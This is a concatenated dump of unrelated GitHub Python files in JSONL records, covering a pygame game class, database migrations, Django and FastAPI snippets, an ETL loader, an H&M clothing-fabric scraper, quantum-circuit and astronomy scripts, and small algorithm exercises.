move_left(self):\n if self.leftPoint[0] > 10:\n #print(self.topPoint[0], self.topPoint[1])\n self.topPoint[0] -= 10\n self.rightPoint[0] -= 10\n self.leftPoint[0] -= 10\n else:\n return\n\n def move_right(self):\n if self.rightPoint[0] + 10 < self.windowWidth:\n self.topPoint[0] += 10\n self.rightPoint[0] += 10\n self.leftPoint[0] += 10\n else:\n return\n\n def missilesFired(self):\n return len(self.missileList)\n\n def fire(self):\n if self.missilesFired() > 2:\n return\n else:\n oMissile = Missile(self.window, self.windowWidth,\n self.windowHeight, self.topPoint[0], self.topPoint[1])\n self.missileList.append(oMissile)\n\n def update(self):\n for missile in list(self.missileList):\n missile.update()\n if missile.location():\n self.missileList.remove(missile)\n\n def draw(self):\n pygame.draw.polygon(self.window, (0, 255, 0), [\n self.topPoint, self.leftPoint, self.rightPoint], 0)\n for missile in self.missileList:\n missile.draw()\n","repo_name":"JorgeTadeo/astroids-","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71099281012","text":"\"\"\"contract status\n\nRevision ID: a1ab4838fbdb\nRevises: c08f9ddb1374\nCreate Date: 2022-02-23 13:58:42.446942\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'a1ab4838fbdb'\ndown_revision = 'c08f9ddb1374'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('contract_status', sa.Column('has_begin_date', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('contract_status', 'has_begin_date')\n # ### end Alembic commands ###\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"migrations/versions/a1ab4838fbdb_contract_status.py","file_name":"a1ab4838fbdb_contract_status.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72527357174","text":"\"\"\"\n==========================\nlower_triangular_matrix.py\n==========================\n\nPT-BR:\nPreenche a porcao inferior de uma matriz triangular superior, criando uma matriz simetrica.\nAntes de executar esse script, deve-se editar manualmente o arquivo distmat genrado pelo EMBOSS distmat, removendo as linhas inciais (8 linhas) e coluna inicial e final que ficam em branco. Nomear a coluna com os IDs das sequncias (ultima coluna) com o header 'labels'.\n\nEN:\nFills the lower portion of an upper triangular matrix, creating a symmetrical matrix.\nBefore executing this script, you must manually edit the distmat file generated by EMBOSS distmat: remove the starting lines (8 lines) and the starting and ending columns that are blank. Name the column with the sequence IDs (last column) with the header 'labels'.\n\nusage: python3 lower_triangular_matrix.py <distance matrix EMBOSS>\n\n\"\"\"\n\ndef lower_tringular(matrix):\n\timport numpy as np\n\timport pandas as pd\n\n\t#suppress exponential notation, define an appropriate float formatter. I had to do this because numpy was converting the float numbers to scientific notation\n\tnp.set_printoptions(suppress=True, formatter={'float_kind':'{:5.3f}'.format})\n\n\t# carrega dos dados\n\tmatriz = pd.DataFrame(matrix)\n\t# cria o vetor de labels (IDs das sequencias). Essa coluna ja estava com o nome 'labels' (fiz isso manualmente no arquivo de saida do distmat)\n\tmatriz = matriz.replace(0,1)\n\t\n\tlabels = matriz['labels']\n\t# remover a coluna de labels. Nao pode estar na matriz (so pode ter os dados numericos)\n\tmatriz = matriz.drop(labels=['labels'], axis=1)\n\t# preenche a matriz trinagular inferior com zeros.\n\tmatriz = np.triu(matriz)\n\t# substitui a matriz triangular inferior com a matriz tringular superior.\n\tmatriz = matriz + matriz.T - np.diag(np.diag(matriz))\n\n\treturn matriz, labels\n\nif __name__ == '__main__':\n\n\timport numpy as np\n\timport pandas as pd\n\timport sys\n\n\tdados = pd.read_csv(sys.argv[1], sep=',')\n\tmatriz, labels = lower_tringular(dados)\n\n\t# gerar arquivos de saida para usar no R (construir MDS no R)\n\texportar_matriz = pd.DataFrame(matriz)\n\texportar_matriz.to_csv('matriz_distmat2mds.csv')\n\texportar_vator_labels = pd.DataFrame(labels)\n\texportar_vator_labels.to_csv('labels_distmat2mds.csv')\n","repo_name":"TulioMorgan/python_scripts","sub_path":"data_science/lower_triangular_matrix.py","file_name":"lower_triangular_matrix.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28814583680","text":"# coding:u8\n\n# from django.conf.urls import url\n# from snippets import views\n# from rest_framework.urlpatterns import format_suffix_patterns\n\n# urlpatterns = [\n# url(r'^snippets/$', views.snippet_list),\n# url(r'^snippets/(?P<pk>[0-9]+)/$', views.snippet_detail),\n# ]\n\n# urlpatterns = format_suffix_patterns(urlpatterns)\n\n# ------------\n\nfrom django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\n# from snippets import views_3_generics as views\n\n# 6\n# from snippets.views import SnippetViewSet, UserViewSet, api_root\nfrom snippets import views_6_viewset as views\nfrom rest_framework import renderers\n\nfrom django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\n\n\nsnippet_list = views.SnippetViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\nsnippet_detail = views.SnippetViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\nsnippet_highlight = views.SnippetViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\nuser_list = views.UserViewSet.as_view({\n 'get': 'list'\n})\nuser_detail = views.UserViewSet.as_view({\n 'get': 'retrieve'\n})\n\n# urlpatterns = [\n# url(r'^$', views.api_root),\n\n# url(r'^snippets/$', views.SnippetList.as_view(), name='snippet-list'),\n# url(r'^snippets/(?P<pk>[0-9]+)/$', views.SnippetDetail.as_view(), name='snippet-detail'),\n# url(r'^snippets/(?P<pk>[0-9]+)/highlight/$', views.SnippetHighlight.as_view(), name='snippet-highlight'),\n\n# url(r'^users/$', views.UserList.as_view(), name='user-list'),\n# url(r'^users/(?P<pk>[0-9]+)/$', views.UserDetail.as_view(), name='user-detail'),\n\n\n# ]\n\n# 6\n# 已经使用了 format_suffix_patterns\n# urlpatterns = format_suffix_patterns([\n# url(r'^$', views.api_root),\n# url(r'^snippets/$', snippet_list, name='snippet-list'),\n# url(r'^snippets/(?P<pk>[0-9]+)/$', snippet_detail, name='snippet-detail'),\n# url(r'^snippets/(?P<pk>[0-9]+)/highlight/$', snippet_highlight, name='snippet-highlight'),\n# url(r'^users/$', user_list, name='user-list'),\n# url(r'^users/(?P<pk>[0-9]+)/$', user_detail, name='user-detail')\n# ])\n\n# 和上面的 format_suffix_patterns 重复了, 会报错\n# urlpatterns = format_suffix_patterns(urlpatterns)\n\n\n#---- 6, use router\n\n# Create a router and register our viewsets with it.\nrouter = DefaultRouter()\nrouter.register(r'snippets', views.SnippetViewSet)\nrouter.register(r'users', views.UserViewSet)\n\n# The API URLs are now determined automatically by the router.\nurlpatterns = [\n url(r'^', include(router.urls))\n]\n\n","repo_name":"lpnueg4/-Django_REST","sub_path":"xuexi_2/snippets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70346164214","text":"import time\nfrom typing import Dict\n\nimport jwt\n\n\nJWT_SECRET = \"secret\"\nJWT_ALGORITHM = \"HS256\"\n\n\ndef token_response(token: str):\n return {\n \"access_token\": token\n }\n\n# function used for signing the JWT string\ndef signJWT(user_id: str, role: int) -> Dict[str, str]:\n payload = {\n \"id\": user_id,\n \"expires\": time.time() + 600,\n \"role\": role\n }\n token = jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM)\n\n return token_response(token)\n\n\ndef decodeJWT(token: str) -> dict:\n try:\n decoded_token = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM])\n\n # code not related to function name\n return decoded_token if decoded_token[\"expires\"] >= time.time() else None\n except:\n return {}","repo_name":"theminkantoso/fast_api_hello","sub_path":"fast_api_hello/config/auth_handler.py","file_name":"auth_handler.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71160445494","text":"place = {}\n\nactive = True\n\nwhile active:\n name = input(\"What is you name: \")\n address = input(\"where would you go?\")\n\n place[name] = address\n\n repate = input(\"Do you have people\")\n if repate == 'yes':\n continue\n else:\n active = False\n\n \nfor name, plac in place.items():\n print(name + \" want to \" + plac)\n\n","repo_name":"geekboyss/python_work","sub_path":"unit7/exerise/7_10.py","file_name":"7_10.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24529862918","text":"from pyquil import Program\nfrom pyquil.gates import *\nfrom pyquil.api import WavefunctionSimulator\n\n\ndef ghz_state(qubits):\n prog = Program()\n prog = prog + H(qubits[0])\n for q1, q2 in zip(qubits, qubits[1:]):\n prog = prog + CNOT(q1, q2)\n return prog\n \nprog = ghz_state(qubits=[0, 1, 2])\nprint(prog)\n\nwaveFunction = WavefunctionSimulator().wavefunction(prog)\nprint(waveFunction)","repo_name":"PacktPublishing/Learn-Quantum-Computing-with-Python","sub_path":"ch9/ghz_state_qc.py","file_name":"ghz_state_qc.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25222215113","text":"import json\nimport uuid\nimport distance\n\ndef extract_name(text, spacy_model):\n capitalized = \" \".join([t.capitalize() for t in text.split()])\n doc = spacy_model(capitalized) # przetwarzamy tekst jeszcze raz, korzystając z innego modelu\n names = [e for e in doc.ents if e.label_ == \"persName\"] # wybieramy nazwy osób\n try:\n the_name = names[0] # zakładamy że liczy się pierwsza wymieniona nazwa\n except IndexError:\n return None\n full_name = []\n for tok in the_name:\n full_name.append(tok.lemma_.capitalize()) # lematyzujemy nazwę\n full_name = \" \".join(full_name)\n return full_name\n\ndef add_contact(data):\n new_id = str(uuid.uuid4())\n with open(\"contacts.json\") as f: # zapisujemy nazwiska do pliku\n contact_data = json.load(f)\n new_contact = {\"id\": new_id}\n new_contact.update(data)\n contact_data.append(new_contact)\n with open(\"contacts.json\", \"w\") as f:\n json.dump(contact_data, f)\n\n","repo_name":"sagespl/nlp-masterclass","sub_path":"moduł-08/E/assistants/2 adding_contacts/contact_utils.py","file_name":"contact_utils.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28062198842","text":"def bin(n1, r):\n dp = [1]\n for i in range(1, r + 1, 1):\n dp.append(((n1 - i + 1) * dp[i - 1]) / i)\n return dp[r]\n\n\nn = int(input())\nans = 0\nk = n\nwhile 2 * k + 1 >= n:\n ans += bin(k + 1, n - k)\n k -= 1\nprint(int(ans))","repo_name":"abhishek593/Crypto_Sense","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35912769986","text":"import datetime\r\n\r\nfrom typing import Union, List, Iterator\r\n\r\nfrom time import sleep\r\n\r\nimport psycopg2\r\nfrom psycopg2.extensions import connection as pg_connection\r\nfrom psycopg2.extras import DictCursor\r\n\r\nfrom dataclasses import dataclass\r\n\r\nfrom config import PostgreSettings, BATCH_SIZE, pg_settings\r\nfrom backoff import backoff\r\nfrom storage import JsonFileStorage, State\r\nfrom sql import query_filmfork_ids\r\nfrom logger import log_to_file\r\n\r\n\r\nclass PostgreLoader:\r\n settings: PostgreSettings\r\n connection: pg_connection\r\n last_check_date: datetime.datetime\r\n batch_size: int\r\n\r\n def __init__(self):\r\n self.settings = PostgreSettings(**pg_settings)\r\n self.connection = self.get_connection()\r\n self.batch_size = BATCH_SIZE\r\n\r\n @backoff(message_before=\"Try to connect to PostgreSQL\",\r\n message_after=\"Successful connect to PostgreSQL\")\r\n def get_connection(self) -> pg_connection:\r\n \"\"\"\r\n Получение соединения PostgreSQL\r\n\r\n :return: соединение PostgreSQL\r\n \"\"\"\r\n with psycopg2.connect(**pg_settings, cursor_factory=DictCursor) as pg_conn:\r\n return pg_conn\r\n\r\n def fetch_data(self) -> Union[List, Iterator]:\r\n \"\"\"\r\n Осуществляет выгрузку фильмов из Postgre,\r\n обновленных не ранее даты, указанной в файле\r\n состояния\r\n\r\n :return: Совокупность данных по нужным фильмам\r\n \"\"\"\r\n log_to_file('Try load data from PostgreSQL')\r\n\r\n state = State(JsonFileStorage('state.json'))\r\n if not state.get_state('last_load_date'):\r\n state.set_state('last_load_date',\r\n datetime.datetime.isoformat(datetime.datetime.min))\r\n\r\n try:\r\n if self.connection.closed:\r\n self.connection = self.get_connection()\r\n cursor = self.connection.cursor()\r\n cursor.execute(query_filmfork_ids,\r\n (state.get_state('last_load_date'),)\r\n )\r\n\r\n while True:\r\n part_of_data = cursor.fetchmany(self.batch_size)\r\n if not part_of_data:\r\n log_to_file('No data')\r\n return []\r\n else:\r\n log_to_file('Load data...')\r\n for row in part_of_data:\r\n yield row\r\n\r\n except psycopg2.OperationalError as e:\r\n log_to_file(f'Error on load data: {e}')\r\n","repo_name":"san100791/new_admin_panel_sprint_3","sub_path":"01_etl/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42183660503","text":"#!/usr/bin/env python\nimport argparse\n\nfrom isochrones.cluster import StarClusterModel, simulate_cluster\nfrom isochrones import get_ichrone\nfrom isochrones.priors import FehPrior, FlatLogPrior\n\n\ntry:\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\nexcept ImportError:\n rank = 0\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-N', type=int, default=40)\nparser.add_argument('--name', type=str, default='test-binary')\nparser.add_argument('--age', type=float, default=8.56, help='log10(age [yr])')\nparser.add_argument('--feh', type=float, default=-0.42)\nparser.add_argument('--distance', type=float, default=200)\nparser.add_argument('--AV', type=float, default=0.02, help='V-band extinction')\nparser.add_argument('--alpha', type=float, default=-3, help='IMF index')\nparser.add_argument('--gamma', type=float, default=0.3, help='mass ratio index')\nparser.add_argument('--fB', type=float, default=0.5, help='binary fraction')\nparser.add_argument('--models', type=str, default='mist')\nparser.add_argument('--mineep', type=int, default=202)\nparser.add_argument('--maxeep', type=int, default=605)\nparser.add_argument('--maxAV', type=float, default=0.1)\nparser.add_argument('--overwrite', '-o', action='store_true')\nparser.add_argument('--nlive', type=int, default=1000)\n\nargs = parser.parse_args()\n\n\nif rank == 0:\n ic = get_ichrone(args.models)\n\n pars = [args.age, args.feh, args.distance,\n args.AV, args.alpha, args.gamma, args.fB]\n print(pars)\n cat = simulate_cluster(args.N, *pars)\n print(cat.df.describe())\n\n cat.df.to_hdf('{}_stars.h5'.format(args.name), 'df')\n\n model = StarClusterModel(ic, cat, eep_bounds=(args.mineep, args.maxeep),\n max_distance=args.distance*3, max_AV=args.maxAV, name=args.name)\n model.set_prior(feh=FehPrior(halo_fraction=0.5), age=FlatLogPrior((6, 9.5)))\n\n print('lnprior, lnlike, lnpost: {}'.format([model.lnprior(pars),\n model.lnlike(pars),\n model.lnpost(pars)]))\n\nelse:\n model = None\n\nmodel = comm.bcast(model, root=0)\nmodel.fit(overwrite=args.overwrite, n_live_points=args.nlive, init_MPI=False)\n","repo_name":"timothydmorton/isochrones","sub_path":"scripts/test-clusterfit.py","file_name":"test-clusterfit.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"21"} +{"seq_id":"15035228153","text":"muteKey = \"[\"\nexitKey = \"escape\"\nunmuteKey = \"]\"\nrunning = False\n\n\n# functions to modify variables called from ui\ndef modify_MuteKey(newMute):\n global muteKey\n if newMute == \"\":\n muteKey = muteKey\n else:\n muteKey = newMute\n\n\ndef modify_UnmuteKey(newUnmute):\n global unmuteKey\n if newUnmute == \"\":\n unmuteKey = unmuteKey\n else:\n unmuteKey = newUnmute\n\n\ndef modify_ExitKey(newExit):\n global exitKey\n if newExit == \"\":\n exitKey = exitKey\n else:\n exitKey = newExit\n","repo_name":"alexCE-99/MuteApp","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30564735258","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n##===-----------------------------------------------------------------------------*- Python -*-===##\n## _ _ \n## | | | | \n## __ _| |_ ___| | __ _ _ __ __ _ \n## / _` | __/ __| |/ _` | '_ \\ / _` |\n## | (_| | || (__| | (_| | | | | (_| |\n## \\__, |\\__\\___|_|\\__,_|_| |_|\\__, | - GridTools Clang DSL\n## __/ | __/ |\n## |___/ |___/ \n##\n##\n## This file is distributed under the MIT License (MIT). \n## See LICENSE.txt for details.\n##\n##===------------------------------------------------------------------------------------------===##\n\nfrom optparse import OptionParser\n\nfrom .config import Config\nfrom .error import report_fatal_error\nfrom .parser import parse\nfrom .runner import run\n\n\ndef main():\n parser = OptionParser(\"gtclang-tester.py [directories] [options]\")\n\n parser.add_option(\"--gtclang\", dest=\"gtclang\",\n help=\"path to the gtclang executable\", metavar=\"PATH\")\n parser.add_option(\"--cxx\", dest=\"cxx\",\n help=\"path to the c++ compiler used to compile gridtools C++ code\",\n metavar=\"PATH\")\n parser.add_option(\"--gridtools_flags\", dest=\"gridtools_flags\",\n help=\"semicolon separated list of compile flags required to compile gridtools C++ code\",\n metavar=\"FLAGS\")\n parser.add_option(\"--no-progressbar\", dest=\"no_progressbar\", action=\"store_true\",\n help=\"Don't show any progressbar\")\n parser.add_option(\"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\",\n help=\"verbose logging\")\n parser.add_option(\"-g\", \"--generate-reference\", dest=\"generate_reference\", action=\"store_true\",\n help=\"generate reference file for file commands\")\n\n (options, args) = parser.parse_args()\n\n if options.generate_reference:\n Config.generate_reference = True\n\n if options.gtclang:\n Config.gtclang = options.gtclang\n\n if options.verbose:\n Config.verbose = True\n\n if options.gridtools_flags:\n Config.gridtools_flags = options.gridtools_flags\n\n if options.cxx:\n Config.cxx = options.cxx\n\n if options.no_progressbar:\n Config.no_progressbar = True\n\n if not args:\n report_fatal_error('no input directories given')\n\n tests = parse(args)\n return run(tests)\n","repo_name":"MeteoSwiss-APN/gtclang","sub_path":"test/utils/gtclang-tester/gtclang_tester/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10611980367","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport time\nimport io\nfrom datetime import datetime\nimport re\nimport os\nimport json\n\ndef fabric_function(link):\n base_url = 'https://www2.hm.com'\n url = base_url + link\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36'\n }\n\n with requests.Session() as session:\n retries = 3 # Maximum number of retries\n delay = 2 # Delay between retries in seconds\n\n for attempt in range(retries):\n try:\n req = session.get(url, headers=headers)\n req.raise_for_status() # Raise an exception if the request was unsuccessful\n break # If successful, exit the retry loop\n except (requests.RequestException, ConnectionError):\n if attempt < retries - 1:\n time.sleep(delay)\n continue\n else:\n raise # If all retries fail, raise the exception\n soup = bs(req.content, 'html.parser')\n\n fabric = \"\"\n #initialise composition_element\n composition_element = None\n # Find the specific <div> element with id=\"section-materialsAndSuppliersAccordion\"\n try:\n div_element = soup.find('div', {'id': 'section-materialsAndSuppliersAccordion'})\n composition_element = div_element.find('h3', text='Composition')\n except:\n pass\n if composition_element:\n # Find all <h4> elements that represent different materials (e.g., Shell, Pocket lining)\n material_headers = div_element.find_all('h4')\n if material_headers:\n for header in material_headers:\n # Get the material name (e.g., Shell, Pocket lining)\n material_name = header.text.strip()\n\n # Get the <p> element containing the material information\n material_info = header.find_next('p')\n\n # Extract the text content of the <p> element\n material_text = material_info.get_text(strip=True)\n\n # Append the material information with the corresponding tag\n fabric += f\",[{material_name}] {material_text} \"\n else:\n fabric = \",[Material] \"\n for x in div_element.find_all('li'):\n for y in x.find_all('p'):\n fabric = fabric + y.text\n try:\n additional_info_h3 = div_element.find('h3', text=' Additional material information')\n recycled_info_list = additional_info_h3.find_next('ul').find_all('li', text=lambda text: 'Recycled' in text or 'Organic' in text)\n\n if recycled_info_list:\n # Extract the text content of all the <li> elements containing \"Recycled\" information and store them in a list\n recycled_texts = [item.get_text(strip=True) for item in recycled_info_list]\n # Join all the elements in the list to form a single string\n recycled_info = \", \".join(recycled_texts)\n fabric += \", [Recycled] \" + recycled_info\n except:\n pass\n return fabric\n\nparams = {\n 'sort': 'stock',\n 'image-size': 'small',\n 'image': 'model',\n 'offset': \"1\",\n 'page-size': \"50\"}\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0'}\n\nretries = 3 # Maximum number of retries\ndelay = 2 # Delay between retries in seconds\n\nfor attempt in range(retries):\n try:\n req = requests.get(\n 'https://www2.hm.com/en_gb/ladies/new-arrivals/clothes/_jcr_content/main/productlisting.display.json',\n params=params,\n headers=headers)\n req.raise_for_status() # Raise an exception if the request was unsuccessful\n break # If successful, exit the retry loop\n except (requests.RequestException, ConnectionError):\n if attempt < retries - 1:\n time.sleep(delay)\n continue\n else:\n raise # If all retries fail, raise the exception\n\ninit = req.json()\n\npage_size = 500\ntotal_products = int(init['total'])\noffset = 0\ndf = pd.DataFrame()\nprint(total_products)\nwhile offset < total_products:\n params = {\n 'sort': 'stock',\n 'image-size': 'small',\n 'image': 'model',\n 'offset': str(offset),\n 'page-size': str(page_size)}\n\n retries = 3 # Maximum number of retries\n delay = 2 # Delay between retries in seconds\n\n for attempt in range(retries):\n try:\n req = requests.get(\n 'https://www2.hm.com/en_gb/ladies/new-arrivals/clothes/_jcr_content/main/productlisting.display.json',\n params=params,\n headers=headers)\n req.raise_for_status() # Raise an exception if the request was unsuccessful\n break # If successful, exit the retry loop\n except (requests.RequestException, ConnectionError):\n if attempt < retries - 1:\n time.sleep(delay)\n continue\n else:\n raise # If all retries fail, raise the exception\n\n data = req.json()\n new_df = pd.DataFrame(data['products']) \n new_df['fabric'] = new_df.link.apply(fabric_function)\n \n df = pd.concat([df, new_df], axis=0, ignore_index=True)\n offset += page_size\n\n\ndef read_the_csv(file):\n df = pd.read_csv(file)\n return df\n\n# split the material string into three lists [main material], [secondary material], [recycled material]\ndef parse_material_compositions(materialstring, recycled_tag='Recycled'):\n try:\n splitup = (materialstring.split(\",\"))\n except:\n return [[],[],[]]\n lists = []\n newlist = []\n for i in splitup:\n i = i.strip()\n if len(i) == 0:\n continue\n if i[0] == \"[\":\n try:\n # If new list is empty do not append\n if newlist:\n lists.append(newlist)\n except: \n pass\n newlist = []\n newlist.append(i)\n lists.append(newlist)\n # clean square bracket tag from lists except recycled\n for l in lists:\n try:\n b = l[0].split('] ')\n l[0] = b[1]\n \n if b[0] == \"[Recycled\": \n l.insert(0, \"Recycled\")\n except: \n pass\n return lists\n\ndef get_recycled(lists):\n # recycled list is the one where the first element is 'Recycled'\n for i in lists:\n try:\n if(i[0] == \"Recycled\"):\n return i[1:]\n except:\n pass\n\ndef get_main(lists):\n # Main is always first list\n return lists[0]\n\ndef get_secondary(lists):\n # Obsolete however if needed returns list that is not recycled and not first\n if len(lists) <2:\n return\n secondary = []\n for i in lists[1:]:\n if(i[0] == \"Recycled\"):\n continue\n secondary.append(i)\n if len(secondary) == 0:\n return\n return secondary\n\ndef remove_trademark_symbol(input_string):\n # Define a regular expression pattern to match the trademark symbol (\\u2122 and \\U00002122) in a case-insensitive manner\n pattern = r'\\\\[Uu]([0-9a-fA-F]{4,8})'\n # Use re.sub() to replace all occurrences of the pattern with an empty string\n cleaned_string = re.sub(pattern, '', input_string)\n return cleaned_string\n\ndef split_material_and_percentage(input_string):\n # Define a regular expression pattern to match the material and percentage parts\n pattern = r'^(.*?)(\\d+\\%)$'\n # Use the re.match function to find the pattern in the input_string\n match = re.match(pattern, input_string)\n if match:\n # The first group (index 1) contains the material part\n material = match.group(1).strip()\n # The second group (index 2) contains the percentage part\n percentage = match.group(2).strip()\n material = remove_trademark_symbol(material)\n return material, percentage\n else:\n # If no match is found, return the entire string as material and an empty string for percentage\n return input_string.strip(), \"\"\n\ndef add_columns_and_values(df):\n # Iterate through each row of the DataFrame\n for index, row in df.iterrows():\n composition_list = get_main((parse_material_compositions(row[\"fabric\"])))\n # Extracting the material name and percentage from the list\n for item in composition_list:\n try:\n material, percentage = split_material_and_percentage(item)\n percentage = float(percentage.strip('%'))\n # Adding a new column to the DataFrame if it doesn't exist\n if material.upper() not in df.columns:\n df[material.upper()] = 0 # Initializing the column with None\n # Assigning the percentage value to the corresponding cell\n df.at[index, material.upper()] = percentage\n except:\n # old fabric function may of failed so we will try the link again to get the materials\n link = str(row['link'])\n new_fabric_value = fabric_function(link)\n df.at[index, 'fabric'] = new_fabric_value \n composition_list = get_main((parse_material_compositions(new_fabric_value)))\n # Extracting the material name and percentage from the list\n for item in composition_list:\n try:\n material, percentage = split_material_and_percentage(item)\n percentage = float(percentage.strip('%'))\n # Adding a new column to the DataFrame if it doesn't exist\n if material.upper() not in df.columns:\n df[material.upper()] = 0 # Initializing the column with None\n # Assigning the percentage value to the corresponding cell\n df.at[index, material.upper()] = percentage\n except:\n pass\n pass\n return df\n\n\ndef add_recycled_columns_and_values(df):\n for index, row in df.iterrows():\n composition_list = get_recycled((parse_material_compositions(row[\"fabric\"])))\n if composition_list:\n for item in composition_list:\n try:\n material, percentage = split_material_and_percentage(item)\n material = 'Sustainable ' + material\n percentage = float(percentage.strip('%'))\n # Adding a new column to the DataFrame if it doesn't exist\n if material.upper() not in df.columns:\n df[material.upper()] = 0 # Initializing the column with None\n # Assigning the percentage value to the corresponding cell\n df.at[index, material.upper()] = percentage\n except:\n pass\n return df\n\ndef process_build_file(df, dt):\n materialsdf =add_columns_and_values(df)\n recycledmaterialsdf =add_recycled_columns_and_values(materialsdf)\n recycledmaterialsdf['Date'] = dt\n return recycledmaterialsdf;\n\ndef dataframe_to_json(df):\n json_string = df.to_json(orient='records')\n return json_string\n\ncurrent_datetime = datetime.now().strftime('%Y%m%d-%H%M%S')\ndf = process_build_file(df, current_datetime)\ncsv_filename = f\"data/data_{current_datetime}.csv\"\n\n# Save the DataFrame to the CSV file\ndf.to_csv(csv_filename, index=False)\n\n# Obsolete print (no longer used)\nprint(dataframe_to_json(df))\n","repo_name":"ZoeCrg/MSc_Dissertation","sub_path":"hm_scrape.py","file_name":"hm_scrape.py","file_ext":"py","file_size_in_byte":11613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17088306095","text":"def binary_search(ara, left, right, target):\n if left > right:\n return -1\n\n while left <= right:\n mid = (left + right) // 2\n if ara[mid] == target:\n return mid\n if ara[mid] < target:\n left = mid + 1\n else:\n right = mid - 1\n\n return -1 # not found\n\ndef two_sum_v1(numbers):\n numbers.sort()\n n = len(numbers)\n for i in range(n-1):\n target = 0 - numbers[i]\n target_index = binary_search(numbers, i+1, n-1, target)\n if target_index > i:\n return numbers[i], numbers[target_index]\n\ndef two_sum_v2(numbers):\n found = dict()\n for n in numbers:\n m = 0 - n # or m = n * -1\n try:\n if found[m]:\n return m, n\n except KeyError:\n found[n] = 1\n \ndef two_sum_v3(numbers):\n numbers.sort()\n n = len(numbers)\n k = n - 1\n for i in range(n-1):\n for j in range(k, -1, -1):\n if numbers[i] + numbers[j] == 0:\n return numbers[i], numbers[j]\n if numbers[i] + numbers[j] < 0:\n k = j\n break\n\ndef two_sum_v4(numbers):\n numbers.sort()\n n = len(numbers)\n i, j = 0, n-1\n while i < j:\n if numbers[i] + numbers[j] == 0:\n return numbers[i], numbers[j]\n if numbers[i] + numbers[j] < 0:\n i += 1\n else:\n j -= 1\n\n\nif __name__ == \"__main__\":\n numbers = [8, 3, 6, -1, -4, 4, 3, 9, -7]\n print(two_sum_v1(numbers))\n print(two_sum_v2(numbers))\n print(two_sum_v3(numbers))\n print(two_sum_v4(numbers))","repo_name":"tamim/codinginterviewbook","sub_path":"two_sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"21"} +{"seq_id":"36715544001","text":"# This is a sample Python script.\nfrom matplotlib import pyplot as plt\nfrom numpy import array, dot, zeros, random\nimport matplotlib.pyplot\nfrom random import choice\nimport sklearn\nimport pandas\n#import tensorflow\n# import keras\n\n\"\"\"\nSTRG+SHIFT+I Definition\nSHIFT+ALT+UP or DOWN Zeile verschieben\nALT+UP or DOWN\nSTRG+ALT+LEFT or RIGHT Navigation der Positionen\n\n\"\"\"\n# Press Umschalt+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nheaviside = lambda x: 0 if x < 0 else 1\n\ndef fit(iterations, training_data_set, w):\n errors = []\n weights = []\n for i in range(iterations):\n training_data = 